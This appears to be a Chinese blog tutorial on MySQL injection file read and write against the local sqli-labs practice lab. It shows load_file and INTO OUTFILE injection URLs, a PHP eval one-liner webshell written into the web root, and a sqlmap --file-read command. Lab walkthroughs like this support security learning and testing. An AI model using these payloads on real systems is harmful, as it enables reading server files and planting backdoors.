【安全】P 2-6 MySQL注入读写

本文介绍了MySQL注入中读取和写入文件的技术细节,包括如何利用特定SQL语句读取服务器上的文件、写入文件乃至植入webshell,并通过sqlmap工具进行安全测试。

0X01 MySQL注入读文件

MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够)。下面进行读文件。

读取前提:
1.用户权限足够高,尽量具有root权限
2.secure_file_priv 不为null
在这里插入图片描述
修改配置
在这里插入图片描述
在这里插入图片描述
测试
在这里插入图片描述

漏洞利用演示
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,load_file(“C:\flag.txt”),3 –

0X02 MySQL注入写文件

开启全局general_log
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-7/?id=-1’)) union select 1,’<?php phpinfo();?>’,3 into outfile ‘C:\phpStudy\PHPTutorial\WWW\sqli-labs\Less-7\1.php’ –
在这里插入图片描述

成功写入
在这里插入图片描述

0X03 写入webshell

写入一句话木马,<?php @eval($_POST['cmd']);?>
使用菜刀连接
http://127.0.0.1/sqli-labs/Less-7/?id=-1’)) union select 1,’<?php @eval($_POST[''cmd]);?>’,3 into outfile ‘C:\phpStudy\PHPTutorial\WWW\sqli-labs\Less-7\2.php’ –
在这里插入图片描述
在这里插入图片描述

0X04 sqlmap安全测试

利用sqlmap进行读写文件
sqlmap -hh 查看详细的帮助信息
在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqli-labs/Less-7/?id=1” --file-read “C:\flag.txt”

在这里插入图片描述
在这里插入图片描述
读取成功
可以自己根据语法再尝试一下写入操作

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值